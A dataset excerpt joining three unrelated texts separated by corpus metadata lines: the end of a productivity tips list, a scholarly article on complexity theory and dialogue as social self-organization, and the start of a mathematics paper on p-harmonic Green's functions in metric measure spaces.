broccoli first. If you eat your broccoli before consuming anything else on your plate, you are getting past the most dreaded portion of dinner so you finally can relax and appreciate everything else. Apply this philosophy to other aspects of your life as well. If you do the most difficult task first thing in the morning, you'll alleviate yourself of stress and better appreciate the remainder of your day. 5. Beat the clock. You can play a game: Try to beat the clock! Set a timer for 50 minutes and accomplish a task with complete concentration. As that time is up, take a 10-minute break. Start working again for 50 minutes, then take a 10-minute break. Repeat this cycle until everything is completed. 6. Voice commitments. A vow to yourself is a lot easier to break than one you have given to somebody else. You are more likely to get something accomplished if another individual holds you accountable. Locate an entrepreneurial buddy to monitor your progress as you start a business. 7. Remove all temptations. Checking your Facebook alerts and reading a text might seem like a harmless action that takes no more than five seconds, but doing this really snaps you out of your zone of concentration, which you'll a while to get back into. 8. Enforce the five-minute rule. If an activity takes five minutes or less to finish, do it immediately. This rule is particularly great for responding to emails or washing the dishes. When faced with an activity, instantly ask yourself if it will take five minutes or less to accomplish. If so, do it! 9. Trap yourself. If all else fails, it is time to leave yourself without any option. This means taking drastic measures to make yourself finish a task. For instance, if you have to change your car's oil, have somebody lock you out of your home until your car's oil pan is put away and clean. 10. Accept that you're just human like everyone else. Know that nobody is perfect and you will not be rejected for not flawlessly performing a task. As faced with a challenging activity, tell yourself, 'I am only human, and it is all right to make a mistake.'
null
minipile
NaturalLanguage
mit
null
Authors The complexity revolution that emerged from the work of Lorenz (Gleick, 1988), Prigogine (Prigogine & Stengers, 1984), and many others has certainly spread into management and organizational theory, with implications for economics (Arthur, 1994), human development (Senge, 1990), and organizational theory (Wheatley, 1992). Communication scholars have also recognized a tremendous explanatory potential in complexity (Anderson & Houston, 1997; Hammond, 1997; Hawes, 1999), while noting its limitations (Woods & Simpson, 2002). With this increased scholarship has come greater debate on how complexity and self-organization work within social situations. As Woods and Simpson (2002) have asserted, creating working explanations is problematic. Some frustrated social scientists (Letiche, 2000: 58) have called the complexity paradigm “messy.” Axelrod and Cohen (1999: 15) say, “there is little convergence among theorists who have begun to study complex systems as a class. It is not a field in which a crisp and unified theory has already been developed, nor is one expected in the next few years.” In addition to concerns over the instrumentality of complexity theory, as the paradigm matures and penetrates deeper into each discipline the conversation between disciplines seems to diminish. As a result, important conceptual breakthroughs in one area go unnoticed by another. This article makes two important contributions. The first is to build a conceptual two-way bridge between those who are concerned with communication in scientific disciplines and those who are concerned with communication from social scientific paradigms. Building this conceptual bridge leads to an important redefinition of communication focusing on dialogic processes that lead to social self-organization rather than linguistic processes that lead to a rhetorical destination. Implied in this redefinition is a position that self-organizing systems must define themselves, describe themselves, mark the common ground of order and disorder, and then redefine themselves. Our redefinition toward a process orientation of communication lays the foundation for the second section where we examine the implications of this new definition and identify five different “attractors” around which communicative selforganization occurs. Thus, we show how complexity “works” through dialogic means to create social self-organization in organizational environments, extending our understanding of dialogue “as a way of interacting that facilitates the construction of meaning” (De Weerdt, 1999). REDEFINING COMMUNICATION IN COMPLEXITY TERMS We can redefine communication from two directions. The first is from the scientific complexity paradigm, where we will show how those who describe self-organizing processes redefine communication by arguing that it is a nonreversible and nonpredictive process that is essential for self-organization, defining and confining the social organization to certain structurating possibilities. The second direction is from communication theory, where we will note how some communication scholars have redefined communication in ways that align with scientific complexity concerns. Both the scientific and communication approaches to complexity point toward a dialogic view of communication that is best explained by the principles of self-organization. Of course, the very term “self-organization” has multiple meanings. But communication defined in the self-organizing frame suggests that a system is in an ongoing dialogue with itself in order to define itself, describe itself, mark common sites of order and coherence, mark common sites of disorder and incoherence, and redefine itself. SCIENTIFIC COMPLEXITY AND COMMUNICATION We do not intend to provide an exhaustive literature review of the many contributions that scientific theories of complexity have made toward a redefinition of communication. We are also limited in our review of the scientific literature, focusing mainly on ideas accessible to social sciences. We do, however, want to highlight four critical points coming from complexity science that tear communication from its previous linear paradigm (Carey, 1989) and center its function within complex systems. Scientific theories have shown that communication is nonreversible, nonpredictive, fundamental for self-organization, and system defining. Communication is non-reversible Traditional, rhetorical views of communication popular through the nineteenth and twentieth centuries suggested that communication was a bipolar process that allowed one person to target another, convince the other of their rightness, and then enjoy the power of their persuasive role. If someone “changed their mind,” the rhetorical process was reversed and they were reconverted to the old position. Entire institutions, parliaments, and legal systems were founded on this linear notion that is based on a distinguishable dualism between self and other. During the nineteenth century, the final state of thermodynamic evolution was at the center of scientific research. This was equilibrium thermodynamics. Irreversible processes were looked down on as nuisances, as disturbances, as subjects not worthy of study. Today, the situation has completely changed. We now know that far from equilibrium, new types of structures may originate spontaneously. All communication has an element of the spontaneous. Even a carefully scripted television program can have spontaneous meaning as it is watched in different social and cultural contexts by viewers with different values. Whatever meanings are made go forward and cannot be erased. Communication is non-predictive The spontaneity described by Prigogine comes about as a result of the inherent randomness in any complex system. It is the tension between disorder created by randomness and order imposed by shared meaning and experience that creates the need to communicate. Crutchfield (1986: 46) said that the idea of self-organization within the complexity paradigm “implies new fundamental limits on the ability to make predictions. On the other hand, the determinism inherent in chaos implies that random phenomena are more predictable than had been thought.” In other words, we communicate to find meaning and create order in an equivocal world, but our communication processes create disorder at the same time. Cohen (2002) describes a similar tension in biological systems. Communication is fundamental to self-organization Cramer (1993) argues that self-organizing communication is not a property merely of living structures but of all structures. He says that the randomness brings limited agency to all structures and that “true selforganizing is a property of the entire system” (Cramer, 1993: 171). Cramer’s argument is holistic and implies a material realization that a dialogic information exchange is a central part of self-organization, and that the only real dualisms are symbolically created. The assertion that self-organization is a fundamental property of matter means, at the same time, that this is a priori filled with ideas. It carries within it the idea of its self-organization, its self-realization, all its blueprints and physical manifestations. Accordingly, the idea of human consciousness must have existed as a possibility at the very moment of the big bang. From this point of view, there is no opposition between spirit and matter. In any case, spirit cannot have arisen as a super-structure from matter. The opposite is more likely; a matter devoid of ideas, without the idea of self-organization, does not exist, any more than weightless matter exists. (Cramer, 1993: 172) Communication is life giving and system building Cramer’s notion that consciousness and self-organization (and thus communication) are essentially life giving is shared by other scientists. Complexity biologists like Varela (1987) have suggested that information is life giving and that the movement of information, or communication, is essentially life itself. Information not only informs the other, but it creates the self. Self-reference, according to complexity biologists, is the essential life-giving outcome of communication. This moves biology to a broader and more holistic view of life, articulated by Botkin (1990: 7): We are accustomed to thinking of life as a characteristic of individual organisms. Individuals are alive, but an individual cannot sustain life. Life is sustained only by a group of organisms of many species—not simply by a hoard or mob, but a certain kind of system composed of many individuals of different species—and their environment, making together a network of living and non-living parts that can maintain the flow of energy and the cycling of chemical elements that, in turn, support life. Note that while many of these scholars infer new characteristics, they do not directly address communication. They describe the critical function of networks, information sharing, and talk about self-consciousness and self-reference. They describe the flow of energy and the flow of information. What Wheatley (1992: 105) described is certainly well within the domain of communication: Information is unique as a resource because of its capacity to generate itself. It’s the solar energy of organization—inexhaustible, with new progeny emerging every time information meets with itself. As long as there are senders and receivers linked together in a context, fertility abounds. All that is needed is freedom of circulation to guarantee new births. THE CONTRIBUTIONS OF COMMUNICATION SCHOLARS Simon (1962) is the first known reference in communication literature to self-organization. While many communication scholars argued for a more nonlinear approach drawing from cybernetics and second-order cybernetics (Krippendorff, 1994), it was not until the late 1980s when the ideas from science began making their way into mainstream communication theory. Communication scholars, friendly to the ideas of the new French philosophers (Deleuze & Guittari, 1987; Latour, 1988), first found the vocabulary of complexity helpful in rethinking communication (Anderson & Houston, 1997; Hammond, 1997). Later, some communication scholars went beyond drawing mere conceptual distinctions to using complexity in research designs and in making broad philosophical claims (Hawes, 1999). We are now at a point where we can begin to see how the ideas of selforganization inform our understanding of our most obvious environment: our social interactions. The redefinition of communication in complexity terms features that abandonment of the traditional, rhetorical view of communication as persuasion. It also forces a repositioning of the sensemaking (Weick, 1995) paradigm, where communication reduces equivocality. The complexity paradigm in communication sees the communicative act as a source of both order and disorder present in all systems. Indeed, Luhmann (1984) claims that communication is the medium of all systems. Taylor (2001: 149) explains that Luhmann argues that “the common tendency to see communication as a consequence of one person acting and another reacting is to invert the real relationship between action and communication. It is not action that produces communication. Only communication can produce action.” Luhmann (1992: 251) states, “only within such a network of communication is what we understand as action created.” Following Luhmann’s idea that action does not produce communication, Baraldi (1993) explains that in this perspective, communication must be seen as the process of creating continued communication. In addition, Hammond (1997), influenced by the scientific paradigm, claims that communication cannot be separated from the system itself. Thus, communication produces the interdependent interaction in a system, rather than the interdependent interactions producing certain types of communication. And consequently, communication continually sustains and reproduces the system. “Communication is self-regenerative. In other words, one thing leads to another, to produce sustained interaction” (Taylor, 2001: 149). In simple terms, communication theory is moving from a simplistic persuasive model based on a transmission metaphor, to a new set of framing metaphors and theories based directly or indirectly on complexity. Communication is no longer seen as a rhetorical destination but as a process shared within a social system. Some scholars are beginning to recognize this need to understand communication as the basis of all systems, and specifically self-organizing systems, and to call for scholars to begin uncovering the specific communicative processes by which self-organization in complex systems occurs. Salazar (2002), in discussing self-organization and the generation of group creativity—creativity being a salient issue for complexity scholars, such as Coleman (1999)—claims that there is a need to identify the characteristics of group adaptation in fluctuating environments, “as well as identifying the initial conditions that give rise to system features that enable creative activity” (Salazar, 2002: 180). Dooley and Van de Ven (1999) point out the limitations to current thinking about the complexity perspective, arguing that there is too much emphasis on the implications of complexity and that scholars are overlooking the need to uncover the mechanisms that generate it. Menz (1999: 107) explains, “If communication really is the medium of all systems (Luhmann, 1984), then self-organization must above all constitute itself by and be identifiable through specific processes and forms of communication.” He claims, “we need to inquire into the specifics of self-organizing communication and examine its defining characteristics.” And Salazar (2002) calls for communication scholars to actively become a central part of this defining process. Luhmann (1992: 251-2) explains that to begin this defining process, “one must not begin with the concept of action, but with the concept of communication.” Making the claim that communication is the medium of all systems, especially social systems (Luhmann 1984, 1992), an analysis of some of the many definitions of complexity and self-organization will reveal their underlying communicative assumptions that support this claim. Although these definitions are common understanding among complexity scholars, reevaluating them from a communication perspective will illuminate the communicative nature of complexity and self-organization. DIALOGUE AS SOCIAL SELF-ORGANIZATION: FIVE POINTS OF ORDER AND DISORDER It is often difficult to see how self-organization “works” dialogically within social systems through the communication process because selforganizing occurs in real-time relationships that surface and submerge in our perceptions. Some work has already occurred in this area. According to Axelrod and Cohen (1999), three key terms describe the complex framework of self-organization in social systems: agent, strategy, and population. Agents use strategies to understand and exchange information with a larger population of agents. These agents adapt to their environment as it changes, select which information is necessary to interpret, and interact accordingly to try to bring order to their situations. In other words, Axelrod and Cohen say, people, embedded with identity, communicate with other members of their organization as they make meaning around new phenomena and hope for a specific outcome. They do this in order to keep up with constant challenges and continued change. These people communicate individually or collectively about those things they encounter in their organization that are pertinent to their surroundings, trying to keep up with the constant changes in the organization and the field of the larger economy that surrounds it. An “economy,” as described by Axelrod and Cohen, is a dynamic, selforganizing system. According to Cramer (1993), there must be two elements. The first is a tension, difference, misunderstanding, or underdetermination where meaning is in dispute. It is only when we don’t understand one another that we find the need to communicate. The second is an attractor, domain, or field that binds our social system. An attractor is like a domain, constrained by an underdetermined, fixed point with definable boundaries but unlimited internal possibilities. For example, the weather has definable boundaries. The temperature will never reach 150 degrees Fahrenheit, nor will the wind blow at 200 miles per hour in any weather pattern, but within a weather pattern there are infinite possibilities for wind direction, duration, and other measures. There are enough patterns that prediction is a hope, though never a complete possibility. Cohen and Stewart (1994) describe such an attractor, where they suggest that a realistic portrait of predator-prey dynamics must include both an attractor and a repeller. All populations live within the tension between these two boundaries. If the prey becomes too populous, it allows the predator population to grow, who in turn kill more prey. About these population dynamics they say, “Attractors are the things that the dynamics converge toward if you wait long enough; but once they reach the attractors, they diverge again” (Cohen & Stewart, 1994: 206). From our observations of real-time dialogues and assessment of the literature, we believe that certain tensions are present in every dialogic encounter, and that they cluster around certain attractors. These form permanent questions that are always before us in dialogic situations. These questions may be subtitle or direct, clear or unclear, obvious or opaque, but they are ever present in social self-organization. In other words, they are always part of the dialogue. It is clear that our list is not exhaustive, nor are our examples undisputed. These tensions, although not always obvious, are layered within the dialogue and subjectively experienced. They are “once-occurent events of Being” (Bakhtin, 1993; Shotter, 2000) that can be subtle, elusive, powerful, clear, disputed, disruptive, revealing, and even transformative. They are always in dispute and thus are the rhetorical artefacts of social self-organization. As participants engage one another in dialogic encounters in organization, they enter into a nonreversible field similar to that described by Prigogine (Prigogine & Stengers, 1984) or Hayles (1988) that opens possibilities for change in communicators, their identities, the group, the meaning, and so on. It also opens the possibility of our own confusion. Shotter (2000), in a point very similar to those made by Prigogine and Hayles, cautions us about the problem with this kind of scholarship when he says that we are attempting to characterize a flow while we ourselves are in the current: “Our everyday ways of communicating and understanding each other from within this flow are not best understood by being viewed through the refined and systematized products that emerge from our more everyday, informal modes of communication” (Shotter, 2000: 121). He argues that it is extremely difficult to move “upstream” and make systematic observations about the “special moments” when we are in “an immediate living contact with each other” (Shotter, 2000: 121). The task is indeed difficult, but if we are to adopt the complexity paradigm and use it to describe how this “works,” we must learn to live with this difficulty. We describe each of these observed tensions as just that: tensions that vary in relative significance throughout the process of the self-organizing dialogue (see Table 1). These five tensions were originally developed by Hammond, Anderson, and Cissna for a forthcoming article, “The problematics of power in dialogue,” in Communication Yearbook, Vol. 27. They have been expanded for this article to include a link to issues within complexity theory. Note that the social issues of identity, outcome, meaning, voice, and field are linked to complexity issues that point toward self-organization. Table 1 The social issues in dialogue Social issue Tension Self-organization Identity Self and other The system defining itself Outcome Content and process The system describing itself Meaning Coherence and incoherence The system marking disorder Voice Monovocality between mutuality The system marking order Field Convergence or The system redefining itself THE SOCIAL SYSTEM DEFINING ITSELF THROUGH A DIALOGUE ABOUT IDENTITY The first permanent tension in dialogue concerns the relation between self and other and falls under the label of identity. In a social system that is self-organizing, the communicative function of self-definition is always at play. In communication literature the label is identity, both individual and corporate (Burke, 1968). Communication, philosophy, literary theory, and psychological theories often suggest that self-knowledge and identity construction are possible only through the process of social interaction. Burke described identification not only as the process of distinguishing one’s self from others but as the coequal process of creating a relationship with others. He argued that the formation of identification is what separates humans from animals. Deleuze (1990) believed that all communication begins with “I,” and that the individual is always comparing their central material condition with others. Buber (1958: 28), however, claimed that “Through the Thou a man becomes I.” He says that the tension between the self and the other leads to reflexivity, self-reference, and self-implication. This is the tension that calls the individual to enter into a social relationship through dialogue. The negotiation of self-identity and group identity is both a motive for and a product of dialogue. Identity is continually negotiated between the individual and the whole. The tension between self and other is therefore essential for communication and self-organization to occur, lending credence to those who believe that diversity defined in any terms (intellectual, cultural, racial, gender based, etc.) is essential for healthy dialogue. It also suggests that questions that negotiate difference, such as racism and sexism, are permanent. But how does this “work” in dialogue? Organizational development consultant Marvin Weisbord (1992) seeks participants in his designed dialogues who will ask probing identity questions. He says that stakeholders who are concerned with their relationship to the group lead group members to question their own assumptions. To innovate and lead the group in new directions, says Weisbord, group members must come to see themselves differently. Simply put, new identities create new forms of organizing and different outcomes. THE SOCIAL SYSTEM DESCRIBING ITSELF BY CREATING CONTENT AND PROCESS BOUNDARIES Different cultures define the process and content boundaries for dialogue differently (Kincaid, 1987). This is particularly true when defining what one might suggest is the starting point for dialogue. Hammond (1997) found that structured dialogues in culturally complex groups contain language that negotiates both content and process, but that one usually dominates at different points during the dialogue. For example, in some Asian cultures process must be made explicit before issues of content can be raised, while in some European cultures the content issues must be made explicit before issues of process can be discussed. These differences suggest that while the dialogic tension between content and process is permanent, it is also essential for social self-organization to occur. Hyde and Bineham (2000) distinguished between content-privileged dialogue and process-privileged dialogue. The first, Dialogue1, binds participants to specific practices and presumes that they will engage in active listening and participative decision making across their differences. The success of this kind of dialogue can be determined by how well the participants address content issues. Dialogue2 is less predictable, less driven by content, and is process oriented. It engages us in unpredictable processes of self-implication, communing, and flashes of self-other insight. One way to think about this distinction is to consider what facilitators can do to help dialogue develop. In Dialogue1, facilitators teach skills such as active listening, for example increasing the likelihood of careful consideration of positions among communicators. In Dialogue2, facilitators might primarily think of their task as clearing a space within which moments of dialogic encounter or insight might emerge with as few obstacles as possible. In either case, the tension between content and process leads to communicative behaviors that unite and divide the group around process orthodoxy and content outcomes. Groups socially selforganize as the dialogue leads them to consider what they want to do and how they want to do it. THE SOCIAL SYSTEM MARKING ORDER WITH THE TENSION BETWEEN COHERENCE AND INCOHERENCE In every social environment there is tension between the known and the unknown. Like the proverbial caution sign on the highway, “Watch for falling rocks,” every social system marks common coherence and incoherence. Palmer (1998) suggests that all things are known in the context of a community. It is this permanent tension between coherence and incoherence that demands a dialogue that leads to social self-organization. Weick (1979), Berger and Bradac (1982), Berger and Calabrese, (1975), Shannon and Weaver (1949), and many others have described communication as a process of uncertainty reduction. Weick (1995) claims that we organize in order to create “sensemaking” environments that have a workable level of certainty. Organizations create a coherent environment where we act with some confidence and predict the effect of our actions. But Weick acknowledges that this is an ongoing process that, while desired, is never fully accomplished. Although each of these theorists rightfully argues that uncertainty reduction is a motive for individual communication, our position is that in dialogue the tension between coherence and incoherence is shared. Consider Tannen’s (1989: 152) description of pleasing conversations that lead to a sense of coherence: “The experience of a perfectly tuned conversation is like an artistic experience. The satisfaction of shared rhythm, shared appreciation of nuance, [and] mutual understanding … surpasses the meaning of words exchanged … It gives a sense of coherence to the world.” Of course coherence, as we achieve it, is temporary and not always shared simultaneously with other participants in a dialogue. It forms the motivation to communicate in dialogue, and it is a hard-won moment more often than an enduring state of clarity. What is enduring, even permanent, is the tension between coherence and incoherence; that is, the rewarding and clarifying ends of dialogue, which can provide the impulse toward dialogue in the first place. Hayles (1999) sees a similar tension in the semiotics of virtuality when she describes tensions between presence and absence, disruption and replication, and pattern and randomness in a self-organizing meaning system. For the participant in a dialogue, each of these tensional qualities is manifest as relative coherence or incoherence. Absence—physical or mental disruption—and randomness lead to incoherence. Presence, replication, and pattern lead to coherence. THE SOCIAL SYSTEM MARKING VOICE IN THE TENSION BETWEEN MONOVOCALITY AND MUTUALITY The social system does not merely place a caution on disorder, but also marks order by certifying that some ideas have privilege over others. The privilege may come as a result of hyperdemocratization (a majority believe this, so it must be true), scientism (scientific experts certify this, therefore it is true), or some form of orthodoxy. But a majority population implies a minority view, just as experts who separate themselves from the average citizen imply isolation. Orthodoxy, whether religious or otherwise, invites disbelief. Each of these positions has an inherited, permanent tension that exists between the forces of mutuality and hegemonic monovocality. Bohm (1990) tells us that dialogue leverages this tension by moving the group toward shared meaning. Others (Isaacs 1999; Weisbord, 1992) believe that dialogue moves us toward collective action. However, once the collective has formed it becomes controlling and resistance then becomes part of the self-organization process. Bakhtin (1981, 1986) said that a monologism, or single voice privileged over multiple voices, is needed to clarify the human condition. Holquist (1990: 24) told us, “in Bakhtin, there is no one meaning being striven for: the world is a vast congeries of contesting meanings, a heteroglossia so varied that no single term capable of unifying its diversifying energies is possible.” This kind of monovocality stands in tension with mutuality described by Cissna and Anderson (1998) in the Buber-Rogers dialogue. They say that the kind of mutuality articulated by Buber, Rogers, and other theorists of mutuality leads to tension, dialogue, and then unexpected meaning. It emphasizes an individual’s awareness of the uniqueness of others and encourages authenticity. But it does not require the renunciation of roles nor the full disclosure of all personal thoughts. An example of this is the Quaker clearness committee. This is a dialogic form of counseling when a person who is trying to make an important life decision calls together several trusted friends and family. They will sit in a circle for several hours as those who have been asked to counsel ask only questions of the person who is making the life decision. The questions may not contain prescriptions, such as “Why don’t you try this?” (Palmer, 1998). This process lives in the tension between the monovocal and the mutual. It starts with a monovocal description of the question coming from the person who wants help. It guards the monovocal position by allowing the counselors only to ask questions. However, it evokes mutuality by including the clarity of the questioners and by stirring the wisdom that may lie deep within the person who is trying to make the decision. Evidently, a clearness committee is an attempt to leverage the forces of dialogue and lead a person to find order within their lives, even if the order is temporary. THE SOCIAL SYSTEM REDEFINING ITSELF THROUGH THE TENSION BETWEEN CONVERGENT AND EMERGENT OUTCOMES Coherence is temporary, but it is critical because it allows the social system to converge on collective rather than random actions. Over time, social systems that are defined by order will need to redefine themselves. Social selforganization through dialogue is a nonlinear, communicative practice that involves emergent mutuality. As the collective intent of certain groups demands convergence on intended outcomes, a dialogic field of meaning acts much like a “strange attractor,” giving the group’s intention a sense of momentum. The vision, collective abilities, and experience of the group create boundary conditions that limit the outcomes, but human agency also opens up the system to infinite possible outcomes within those boundaries. The key question is whether the field is converging on a problem or series of problems, or whether it is open, waiting for a mutual direction to emerge. The convergent-emergent tension is found in the literature of deliberative democracy theory. Habermas (1992) says that people come to a dialogue ready to hear others’ arguments and subject their own arguments to the same criteria of reasonableness and clarity as the positions they originally dislike. This creates communication that builds common ground and increases the chances of consensus. Consensus, reached through deliberation and verbal competition, appears to be the normative goal of convergent dialogue. Such convergent assumptions virtually mandate that unity, in the sense of shared meaning, is “the” goal of dialogue, not merely “a” goal of dialogue. They also keep other important voices out of the dialogue. The task in dialogue is not to submerge voices if they don’t reflect the “right” kinds of rationality, but to do what we can to bring them to the surface as contributors. The convergent-emergent tension is a reflection of the proceduralist-pluralist tension confronting a wide range of public and governmental decision-making situations. CONCLUSION: DIALOGUE AS SOCIAL SELF-ORGANIZATION Early in this article we described the characteristics of communicative self-organizing systems by describing a social system’s need to define itself, describe itself, mark order, mark disorder, and converge or emerge on action. We describe these as tensions because a social system is never without some dialogue-creating dispute related to these tensions. To be sure, the dialogue can occur on a variety of levels, including small groups, communities, societies, and even with oneself. We describe these dialogues as social self-organization because they give us, as subjective human beings, our sense of identity, the expectation of certain outcomes, the assumed meaning of communicative acts, a pretense of voice, and a sense of social situation or field. The dialogic self-organization around identity moves toward establishing the self and the other, making clearer the roles of the participants. Dialogue around identity may lead to a re-entrenchment of identity roles or to newly established roles. The tension in dialogue between content and processes is also permanent and leads to self-organization. The tension between coherence and incoherence is required to begin dialogue (Kogler, 1996). However, as dialogue continues and fills in the limits of its own meaning, emergence can take over and move the group toward incoherence. Isaacs (1999) describes this as instability. Wheatley (1992) describes it as a productive, localized “chaos” that creates an opportunity for participants to let go of previous assumptions. We suggest that declarations of coherence are essential for self-organizing systems because they allow the system collectively to move forward with confidence. As US President George W. Bush declared coherence on an aggressive foreign policy that will force the disarmament of Iraq, he caused others to demand additional consideration. Congress, the United Nations, and the governments of other nations deliberated carefully to see if they would or could align with his position. The declaration of coherence created an opportunity for dialogue even as it was described as an imposition. Kogler (1996: 84) argues that “dialogic understanding can no longer proceed from the idea of a universal consensus … it must … make present one’s own constraints through an understanding of the other, and of gaining knowledge of certain limits of the other through one’s own perspective.” We suggest that coherence and incoherence are ever present in the dialogic experience, surfacing and resurfacing at different times. Finally, we consider voice in the self-organizing mix. In some dialogic situations, in a given time period, the monovocal voice, according to Hawes (1999), sweeps away any opposition. He argues that a single, privileged voice can be tyrannical and oppressive. Ellsworth (1989) says that some populations that are raced, classed, or gendered are so inherently unequal in their identity and access to the process that real dialogue is impossible. Nevertheless we argue that eventually, perhaps over generations, the system will self-organize and self-correct through the forces of mutuality. This was the hope of Freire (1970: 76-7), who said: Dialogue is the encounter between men, mediated by the world, in order to name the world. Hence dialogue cannot occur between those who want to name the world and those who do not wish this naming—between those who deny other men the right to speak their word and those whose right to speak has been denied them. In recent years there has been a great deal of discussion about selfsustaining organizations. It is clear that organizations that can self-correct toward more ethical behaviors need to sustain the forces of selforganization through dialogue. While there is a danger in the tyrants described by Freire who will keep us from dialogue in order to control the naming of the world, there is a more common danger in those who see dialogue as inefficient. In doing so they deny us access to our identity, pushing us toward a specified coherence spoken by a privileged voice. But more importantly, they deny the system the opportunity to self-organize and hopefully to adapt to our social environments in a more friendly and ethical fashion.
null
minipile
NaturalLanguage
mit
null
--- abstract: 'We describe the behavior of [[$p\mspace{1mu}$]{}]{}-harmonic Green’s functions near a singularity in metric measure spaces equipped with a doubling measure and supporting a Poincaré inequality.' address: - | Department of Mathematics\ Purdue University\ West Lafayette, IN 47907, USA - | Department of Mathematics\ Purdue University\ West Lafayette, IN 47907, USA - | Department of Mathematics and Systems Analysis\ Helsinki University of Technology\ P.O. Box 1100 FI-02015 TKK\ Finland author: - Donatella Danielli - Nicola Garofalo - Niko Marola title: 'Local behavior of [[$p\mspace{1mu}$]{}]{}-harmonic Green’s functions in metric spaces' --- [^1] [^2] *This paper is dedicated to the memory of Professor Juha Heinonen* Introduction ============ Holopainen and Shanmugalingam [@HoSha] constructed in the metric measure space setting a [[$p\mspace{1mu}$]{}]{}-harmonic Green’s function, called a singular function there, having most of the characteristics of the Green function which is the fundamental solution of the Laplace operator. In this paper we study the following question related to the local bahavior of a [[$p\mspace{1mu}$]{}]{}-harmonic Green’s function on locally doubling metric measure space $X$ supporting a local $(1,p)$-Poincarè inequality: Given a relatively compact domain ${\Omega}\subset X$, $x \in {\Omega}$, and a [[$p\mspace{1mu}$]{}]{}-harmonic Green’s function $G$ with a singularity at $x$, then can we describe the behavior of $G$ near $x$? Capacitary estimates for metric rings play an important role in the study of the asymptotic behavior. Following the ideas in the works of Serrin [@Serrin1], [@Serrin2], (see also [@LSW]) such estimates were used in Capogna et al. [@CaDaGa] to establish the local behavior of singular solutions to a large class of nonlinear subelliptic equations which arise in the Carnot–Carathéodory geometry. Sharp capacitary estimates for metric rings with unrelated radii were established in the metric measure space setting in [@GaMa]. Here, we confine ourselves to mention that a fundamental example of the spaces included in this paper is obtained by endowing a connected Riemannian manifold $M$ with the Carathéodory metric $d$ associated with a given subbundle of the tangent bundle, see [@Ca]. If such subbundle generates the tangent space at every point, then thanks to the theorem of Chow [@Chow] and Rashevsky [@Ra] $(M,d)$ is a metric space. Such metric spaces are known as sub-Riemannian or Carnot-Carathéodory (CC) spaces. By the fundamental works of Rothschild and Stein [@RS], Nagel, Stein and Wainger [@NSW], and of Jerison [@J], every CC space is locally doubling, and it locally satisfies a $(p,p)$-Poincarè inequality for any $1\leq p<\infty$. Another basic example is provided by a Riemannian manifold $(M^n,g)$ with nonnegative Ricci tensor. In such case thanks to the Bishop comparison theorem the doubling condition holds globally, see e.g. [@Ch], whereas the $(1,1)$-Poincarè inequality was proved by Buser [@Bu]. An interesting example to which our results apply and that does not fall in any of the two previously mentioned categories is the space of two infinite closed cones $X=\{(x_1,\ldots, x_n)\in{\mathbb{R}}^n:\ x_1^2+\ldots +x_{n-1}^2\leq x_n^2\}$ equipped with the Euclidean metric of ${\mathbb{R}}^n$ and with the Lebesgue measure. This space is Ahlfors regular, and it is shown in Hajłasz–Koskela [@HaKo Example 4.2] that a $(1,p)$-Poincaré inequality holds in $X$ if and only if $p>n$. Another example is obtained by gluing two copies of closed $n$-balls $\{x\in {\mathbb{R}}^n:\ |x|\leq 1\}$, $n\geq 3$, along a line segment. In this way one obtains an Ahlfors regular space that supports a $(1,p)$-Poincare inequality for $p>n-1$. A thorough overview of analysis on metric spaces can be found in Heinonen [@heinonen]. One should also consult Semmes [@Semmes] and David and Semmes [@DaSem]. Our main result in this paper is a quantative description of the local behavior of a [[$p\mspace{1mu}$]{}]{}-harmonic Green’s function defined in Holopainen–Shanmugalingam [@HoSha]. We shall prove that a Green’s function $G$ with a singularity at $x_0$ in a relatively compact domain satisfies the asymptotic behavior $$G(x) \approx \biggl(\frac{d(x,x_0)^{p}}{\mu(B(x_0,d(x,x_0)))}\biggr)^{1/(p-1)},$$ where $x$ is uniformly close to $x_0$. Our approach uses upper gradients á la Heinonen and Koskela [@HeKo], and [[$p\mspace{1mu}$]{}]{}-harmonic functions that can be characterized in terms of [[$p\mspace{1mu}$]{}]{}-energy minimizers among functions with the same boundary values in relatively compact subsets. Following [@HoSha] we adopt a definition for Green’s functions that uses an equation for [[$p\mspace{1mu}$]{}]{}-capacities of level sets. We want to stress the fact that even in Carnot groups of homogeneous dimension $Q$ it is not known whether such [[$p\mspace{1mu}$]{}]{}-harmonic Green’s function is unique when $1<p<Q$. However, in the conformal case, i.e. when $p=Q$, the uniqueness for Green’s function for the $Q$-Laplace equation in Carnot groups was settled by Balogh et al. in [@BHT]. The paper is organized as follows. The second section gathers together the relevant background such as the definition of doubling measures, upper gradients, Poincaré inequality, Newton–Sobolev spaces, and capacity. In Section 3 we recall sharp capacitary estimates for metric rings with unrelated radii proved in Garofalo–Marola [@GaMa]. In Section 4 we give the definition of Green’s functions. We establish the local behavior of Green’s functions in Section 5, and we also prove a result on the local integrability of Green’s functions. Section 6 closes the paper with a result on the local behavior of Cheeger singular functions. In this section our approach uses Cheeger gradients (see Cheeger [@Cheeger]) emerging from a differentiable structure that the ambient metric space admits. In particular, [[$p\mspace{1mu}$]{}]{}-harmonic functions can thus be characterized in terms of a weak formulation of the [[$p\mspace{1mu}$]{}]{}-Laplace equation. Acknowledgements {#acknowledgements .unnumbered} ---------------- The authors would like to thank Nageswari Shanmugalingam for valuable comments on the manuscript and her interest in the paper. The paper was completed while the third author was visiting Purdue University in 2007–2008. He thanks the Department of Mathematics for the hospitality and several of its faculty for fruitful discussions. Preliminaries {#prelim} ============= We begin by stating the main assumptions we make on the metric space $X$ and the measure $\mu$. General Assumptions {#assumptions} ------------------- Throughout the paper $X=(X,d,\mu)$ is a locally compact metric space endowed with a metric $d$ and a positive Borel regular measure $\mu$. We assume that for every compact set $K\subset X$ there exist constants $C_K \geq 1$, $R_K>0$ and $\tau_K \ge 1$, such that for any $x\in K$ and every $0<r\leq R_K$, $0<\mu(B) <\infty$, where $B:=B(x,r):=\{y\in X:\ d(y,x)<r\}$, and, in particular, one has: - the closed balls $\overline B(x,r)=\{y\in X:d(y,x)\leq r\}$ are compact; - (local doubling condition) $\mu(B(x,2r)) \le C_K \mu(B(x,r))$; - (local weak $(1,p_0)$-Poincaré inequality) there exists $1<p_0<\infty$ such that for all measurable functions $u$ on $X$ and all upper gradients $g_u$ (see Section 2.3) of $u$ $$\label{PI-ineq} \vint_{B(x,r)} |u-u_{B(x,r)}| \,{d\mu}\le C_K r \Big( \vint_{B(x,\tau_K r)} g_u^{p_0} \,{d\mu}\Big)^{1/p_0},$$ where $ u_{B(x,r)} :=\vint_{B(x,r)}u \, d\mu :=\int_{B(x,r)} u\, d\mu/\mu(B(x,r))$. - (X is $\operatorname{LLC}$, i.e. linearly locally connected) there 